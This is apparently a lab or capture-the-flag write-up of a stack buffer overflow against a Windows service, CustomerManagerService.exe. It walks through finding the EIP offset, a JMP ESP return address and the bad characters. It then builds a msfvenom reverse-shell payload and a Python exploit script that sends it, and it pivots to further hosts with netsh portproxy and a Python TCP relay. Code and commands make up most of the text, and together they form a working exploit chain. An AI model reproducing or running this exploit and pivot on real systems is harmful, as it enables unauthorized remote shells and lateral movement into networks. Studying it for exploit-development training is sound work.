Bo F

An nmap scan revealed that port 42424 is open on a local Windows machine running CustomerManagerService.exe. The program was analyzed in Immunity Debugger: sending a cyclic pattern caused an access violation, the value left in EIP gave the offset to the saved return address, and that offset was confirmed by overwriting EIP with 'BBBB'. The final exploit used a msfvenom reverse shell, and a network pivot was set up to reach a remote server.

Uploaded by furious fighters

After performing an nmap scan on our local Windows machine (192.168.60.29), we discovered that port 42424 is open.

The CustomerManagerService.exe application just starts a server and waits for incoming connections.

Let's start Immunity Debugger and attach it to the running CustomerManagerService.exe process so we can analyze how the program handles our input.
The first thing we have to do is find how many bytes it takes to reach the saved return address, i.e. the offset to EIP. We generate a cyclic pattern with the msf-pattern_create tool (every four-byte window in the pattern is unique) and send it to the program to see how it responds.

After sending the data, the program crashes with an access violation, which is a good sign for an attacker: our input has overwritten the saved return address. EIP holds the value 0x39654138, which is four consecutive bytes of our pattern (little-endian, so "8Ae9" as laid out in memory). EIP value ⇒ 39654138
Feeding that value to msf-pattern_offset gives the offset, the exact number of bytes before the overwritten return address. Offset value ⇒ 146
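As an added illustration (not part of the original write-up), here is a small Python reimplementation of what msf-pattern_create and msf-pattern_offset do, showing why the crash value 0x39654138 maps to offset 146: EIP holds four consecutive pattern bytes in little-endian order, so the value is byte-reversed before searching the pattern.

```python
import struct
from itertools import product

UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
LOWER = "abcdefghijklmnopqrstuvwxyz"
DIGIT = "0123456789"


def pattern_create(length: int) -> bytes:
    """Reproduce msf-pattern_create: the pattern is a sequence of 3-byte groups
    Aa0 Aa1 ... Aa9 Ab0 ... Zz9, so any 4-byte window is unique within one
    cycle (20280 bytes)."""
    groups = []
    for upper, lower, digit in product(UPPER, LOWER, DIGIT):
        groups.append(upper + lower + digit)
        if len(groups) * 3 >= length:
            break
    return "".join(groups).encode()[:length]


def pattern_offset(eip_value: int, length: int = 3000) -> int:
    """Reproduce msf-pattern_offset -q <hex>: the register holds the 4 pattern
    bytes in little-endian order, so pack the value little-endian to recover
    the bytes as they sat in memory, then locate them in the pattern."""
    needle = struct.pack("<I", eip_value)      # 0x39654138 -> b"8Ae9"
    pattern = pattern_create(length)
    index = pattern.find(needle)
    if index < 0:
        raise ValueError("value %#x not found in a %d-byte pattern" % (eip_value, length))
    return index


if __name__ == "__main__":
    # The crash value reported on the page maps to offset 146.
    print(pattern_offset(0x39654138))
```

The same function also works for other registers that receive pattern bytes: packing ESP's contents and searching for them tells you where in the buffer ESP points, which is what makes the JMP ESP technique used later land in attacker-controlled data.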

To confirm the offset, we overwrite EIP with "BBBB": 146 bytes of padding followed by "BBBB". A crash with EIP = 0x42424242 proves the value is right.
Next we need an instruction that redirects execution into our buffer. ESP points at the data right after the overwritten return address, so we search the loaded modules for a JMP ESP with mona. Mona command ⇒ !mona jmp -r esp
Two candidate addresses are returned. JMP address ⇒ 0x080414C3 || 0x080416BF
Neither address contains a byte we later identify as bad (\x00 or \x0a), so either can be used as the return address.

We set a breakpoint at the chosen JMP ESP address in Immunity Debugger before running the script, then send the 146 bytes of padding followed by the address, written in little-endian byte order, in place of "BBBB".
After running the script, the program pauses at the breakpoint at 0x080416BF waiting for further instructions. This confirms that execution has been redirected to our JMP ESP and will continue in the bytes that follow the return address.

To find bytes the application mangles or truncates on, we send every value from \x01 to \xff after the return address and compare the copy in memory with what we sent. Two characters cause problems and must be kept out of the shellcode. Bad chars ⇒ \x00\x0a
With the bad characters known, we use msfvenom to generate the final shellcode that we send to the target to get a reverse shell. Command ⇒
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.60.29 LPORT=9001 -b "\x00\x0a" -f py

Running our final exploit.

Getting a callback to our netcat listener.
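The steps above (padding to the offset, the return address in little-endian order, a NOP sled, then shellcode free of bad characters) are collected in this added Python example; it is not the script from the original write-up. The offset 146, the JMP ESP address 0x080416BF and the bad characters \x00\x0a are taken from the text; the shellcode is a constructed placeholder of INT3 instructions standing in for the msfvenom `buf` variable, and the target host and port in the main block are assumptions.

```python
import socket
import struct

OFFSET = 146                 # from the write-up: bytes before the saved return address
JMP_ESP = 0x080416BF         # from the write-up: "!mona jmp -r esp" result
BAD_CHARS = b"\x00\x0a"      # from the write-up


def all_bytes_except(bad: bytes) -> bytes:
    """Byte array for bad-character hunting: every value 0x01..0xff minus the
    values already known to be bad. 0x00 is excluded up front because it
    terminates C strings and almost always truncates the input."""
    return bytes(b for b in range(1, 256) if b not in bad)


def check_bad_chars(data: bytes, bad: bytes) -> list:
    """Return [(index, byte)] for every bad byte in data, so a return address
    or shellcode containing one is caught before it is sent."""
    return [(i, b) for i, b in enumerate(data) if b in bad]


def build_payload(shellcode: bytes, offset: int = OFFSET, ret: int = JMP_ESP,
                  bad: bytes = BAD_CHARS, nops: int = 16) -> bytes:
    """Assemble padding | return address (little-endian) | NOP sled | shellcode.
    With ret=0x42424242 and nops=0 this is the "BBBB" offset-confirmation
    buffer; with the JMP ESP address it is the real exploit buffer."""
    ret_bytes = struct.pack("<I", ret)            # 0x080416BF -> b"\xbf\x16\x04\x08"
    for name, part in (("return address", ret_bytes), ("shellcode", shellcode)):
        hits = check_bad_chars(part, bad)
        if hits:
            raise ValueError("bad characters in %s: %r" % (name, hits))
    return b"A" * offset + ret_bytes + b"\x90" * nops + shellcode


def send_payload(host: str, port: int, payload: bytes, timeout: float = 5.0) -> None:
    """Deliver the buffer to the listening service."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(payload)


if __name__ == "__main__":
    # Constructed placeholder: paste the msfvenom "buf" here for the real run.
    buf = b"\xcc" * 4
    # Assumed target (the page's local Windows machine and port 42424).
    send_payload("192.168.60.29", 42424, build_payload(buf))
```

Running the bad-character check against the return address as well as the shellcode is deliberate: a JMP ESP address that happens to contain \x0a would be corrupted on the wire exactly like shellcode would, and the crash it produces looks like a wrong offset rather than a bad byte.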

Now that we have exploited the local machine, it is time to exploit the remote server at 10.185.10.55. It is not directly reachable from our machine, so we first need to pivot through the network so that we can deliver the payload from our local machine.
We create a port forward on the developer machine (10.185.10.34) towards the web server (10.90.60.80) with netsh portproxy. Command ⇒ netsh interface portproxy add v4tov4 listenaddress=10.185.10.34 listenport=3434 connectaddress=10.90.60.80 connectport=3333
This makes the developer host accept connections on 10.185.10.34:3434 and relay them to 10.90.60.80:3333 (portproxy depends on the IP Helper service running, and the listening port must be allowed through the Windows firewall; netsh interface portproxy show all lists the active forwards). Having connected the developer host (10.185.10.34) to the web server (10.90.60.80), we next need to connect the web server to the attacker IP, 172.16.40.5.
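As an added example (not a command from the original write-up), the following Python relay does on any host what netsh portproxy does on the developer machine: it listens on one address and forwards each accepted connection to another, which is what lets the payload cross from one network segment to the next. The echo server and the loopback addresses are constructed test fixtures; in real use the listen address would be the pivot host's interface (10.185.10.34:3434 in the text) and the connect address the next hop (10.90.60.80:3333).

```python
import socket
import threading


def _pipe(src: socket.socket, dst: socket.socket) -> None:
    """Copy bytes from src to dst until src closes, then close dst's write side
    so the far end sees end-of-stream (mirrors the half-close semantics a TCP
    proxy must preserve)."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def _handle(client: socket.socket, connect_addr) -> None:
    """Open the upstream leg for one accepted connection and pump both directions."""
    try:
        upstream = socket.create_connection(connect_addr, timeout=5)
    except OSError:
        client.close()
        return
    upstream.settimeout(None)
    t = threading.Thread(target=_pipe, args=(client, upstream), daemon=True)
    t.start()
    _pipe(upstream, client)
    t.join()
    client.close()
    upstream.close()


def start_portproxy(listen_addr, connect_addr):
    """Equivalent of 'netsh interface portproxy add v4tov4': accept on
    listen_addr, relay each connection to connect_addr. Returns the listening
    socket and the bound port (pass port 0 to let the OS pick one)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(listen_addr)
    srv.listen(5)

    def accept_loop():
        while True:
            try:
                client, _ = srv.accept()
            except OSError:          # listening socket closed: stop
                return
            threading.Thread(target=_handle, args=(client, connect_addr), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv, srv.getsockname()[1]


def start_echo_server():
    """Constructed stand-in for the far end of the pivot: echoes what it receives."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def serve(conn):
        with conn:
            while True:
                data = conn.recv(4096)
                if not data:
                    break
                conn.sendall(data)

    def accept_loop():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            threading.Thread(target=serve, args=(conn,), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv, srv.getsockname()[1]


def relay_roundtrip(message: bytes) -> bytes:
    """Send message through proxy -> echo server over loopback and return the reply."""
    echo_srv, echo_port = start_echo_server()
    proxy_srv, proxy_port = start_portproxy(("127.0.0.1", 0), ("127.0.0.1", echo_port))
    try:
        with socket.create_connection(("127.0.0.1", proxy_port), timeout=5) as s:
            s.sendall(message)
            s.shutdown(socket.SHUT_WR)
            chunks = []
            while True:
                data = s.recv(4096)
                if not data:
                    break
                chunks.append(data)
        return b"".join(chunks)
    finally:
        proxy_srv.close()
        echo_srv.close()
```

Each hop in a chain like developer host → web server → attacker is one more instance of start_portproxy with its own listen and connect addresses; as with netsh, the relay is a plain TCP forward with no encryption, so anything sent through it is visible on every intermediate host.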
